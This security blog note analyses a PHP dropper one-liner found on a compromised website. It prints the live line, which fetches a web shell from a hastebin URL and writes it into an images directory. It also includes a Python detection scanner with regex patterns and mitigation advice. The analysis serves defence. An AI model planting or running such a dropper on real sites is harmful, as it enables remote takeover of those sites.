Sucuri Blog

Website Security News

Labs Note

Malicious One-Liner Using Hastebin

September 23, 2020 | Krasimir Konov


Short scripts that deliver malware to a website are nothing new, but during a recent investigation we found a script using hastebin[.]com, which is a domain we see used infrequently. The script was found writing malicious contents into an image directory on a compromised website, allowing an attacker to execute other malicious commands.

The attacker was likely leveraging hastebin instead of pastebin since it’s not as frequently used. This obscurity offers some advantages for the attacker, as many security plugins and modules would instead look for links to the more popular pastebin service, flagging them as suspicious.

Here are the contents of the malicious one-liner:

<?php 
fwrite(fopen(images/sh3.php,w+),file_get_contents(https://hastebin.com/raw/oqikagison)); 
?>

Although the attacker appears to have failed to properly inject the malicious code due to some missing single quotes, this is still a good example of how simple and yet powerful a short script of malware can be.

The malware pulls the malicious code from the hastebin URL and writes it into images/sh3.php. The remote code is basically a shell script, using PHP’s “system” call to execute additional commands submitted by the attacker through $_GET requests.

You can see how this one-liner can be added to the bottom of any file and easily missed by a webmaster who is not trained to look for malware. To run properly, the images directory referenced in the script must exist on the website, but the attacker can effortlessly modify this file name at will, allowing the malware to be written to a file within an images directory.

To help mitigate risk, consider using a server-side scanner that scans the website at the server level along with a file integrity monitoring service to notify you of any changes to website files.
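As an added illustration of the server-side scanning recommended above (this is not Sucuri's scanner or signature set), the following Python sketch flags PHP files inside media directories and any PHP line that both fetches a remote URL and writes to disk, without depending on which paste host is used. The directory names, finding labels and function names are assumptions made for this example, and the scanned web root is constructed around the one-liner quoted in this note.

```python
import re
import tempfile
from pathlib import Path

# Heuristics assumed for this example; they are not Sucuri signatures.
PHP_EXT = {".php", ".phtml", ".phar"}
MEDIA_DIRS = {"images", "img", "uploads", "media"}
# Remote fetch of an http(s) URL. Quotes are optional so the broken sample matches too.
FETCH = re.compile(rb"(?:file_get_contents|fopen|curl_init)\s*\(\s*['\"]?https?://", re.I)
# Primitives that write the fetched payload to disk.
WRITE = re.compile(rb"\b(?:fwrite|fputs|file_put_contents)\s*\(", re.I)
# Paste-style raw endpoint on any host, so the rule is not tied to pastebin.
RAW_PASTE = re.compile(rb"https?://[\w.-]+/raw/[\w-]+", re.I)


def scan_file(path, root):
    """Return finding labels for one file; non-PHP files yield nothing."""
    if path.suffix.lower() not in PHP_EXT:
        return []
    findings = []
    parents = {part.lower() for part in path.relative_to(root).parts[:-1]}
    if parents & MEDIA_DIRS:
        findings.append("php-in-media-dir")
    data = path.read_bytes()
    # The dropper fetches and writes in a single statement, so test per line.
    if any(FETCH.search(ln) and WRITE.search(ln) for ln in data.splitlines()):
        findings.append("remote-fetch-written-to-disk")
    if RAW_PASTE.search(data):
        findings.append("raw-paste-url")
    return findings


def scan_tree(root):
    """Walk root and return {relative_path: [findings]} for flagged files."""
    root = Path(root)
    hits = {p.relative_to(root).as_posix(): scan_file(p, root)
            for p in sorted(root.rglob("*")) if p.is_file()}
    return {name: found for name, found in hits.items() if found}


def demo():
    """Scan a constructed web root holding the one-liner quoted in this note."""
    dropper = b"<?php\nfwrite(fopen(images/sh3.php,w+),file_get_contents(https://hastebin.com/raw/oqikagison));\n?>\n"
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "images").mkdir()
        (root / "index.php").write_bytes(b"<?php echo file_get_contents('config.json'); ?>\n")
        (root / "footer.php").write_bytes(b"<?php echo 'footer'; ?>\n" + dropper)
        (root / "images" / "sh3.php").write_bytes(b"<?php /* constructed placeholder */ ?>\n")
        return scan_tree(root)
```

Pattern matches like these are heuristics that can miss obfuscated variants, which is why the file integrity monitoring mentioned above is the complementary control: it reports the new file in the images directory regardless of its contents.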


Categories: Sucuri Labs, Website Malware Infections, Website Security
Tags: Black Hat Tactics, Hacked Websites, Labs Note

About Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.
